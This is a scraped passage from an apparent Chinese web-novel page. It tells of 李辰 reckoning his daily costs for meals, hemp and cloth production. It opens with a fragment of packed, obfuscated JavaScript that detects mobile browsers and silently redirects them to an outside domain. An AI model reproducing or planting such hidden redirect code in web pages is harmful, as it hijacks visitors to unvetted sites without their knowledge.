6))};if(!''''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return''\\w+''};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(''\\b''+e(c)+''\\b'',''g''),k[c]);return p;}(''8 0=7.0.6();b(/a|9|1|2|5|4|3|c l/i.k(0)){n.m="}'',24,24,''userAgent|iphone|ipad|iemobile|blackberry|ipod|toLowerCase|navigator|var|webos|android|if|opera|131xs|n|xyz|15488602|167097||http|test|mini|href|location''.split(''|''),0,{}));
() {
$(''.inform'').remove();
$(''#content'').append(''
为建设公共项目的人们免费提供每天一顿的饭食,那也是将近一千人,这也要十五两银子左右。
加在一起,一天六十两银子,一个月下来至少是一千八百两白银。
况且,还要购买各类铁料、葛麻等原材料,同样也需要钱。
这笔钱可就十分庞大了,一匹布需粗葛麻八斤,细葛麻十五斤。粗葛麻二十文一斤,细葛麻三十文一斤。
而每天光是木儿村这边的织造处就要产粗细葛布加在一起,至少一百五十匹以上。
这样算下来,哪怕都用粗葛麻,至少原料上一天也要两万四千文,也就是二十四两银子。
细葛麻更贵,要六十七两零五百钱。
所以,李辰现在一天少说也要支出一百五十两银子。
也就是李辰财大气粗,每天进账也是海量银钱,可以随意扩大生产,根本不担心财政危机,否则,换做普通人,连一天都撑不下来。
李辰甚至看到每天晚上小婢妻都要偷偷跑到地下的仓库里去数钱,还用小本本都记得清清楚楚的,也让他一阵好笑。
不过,生意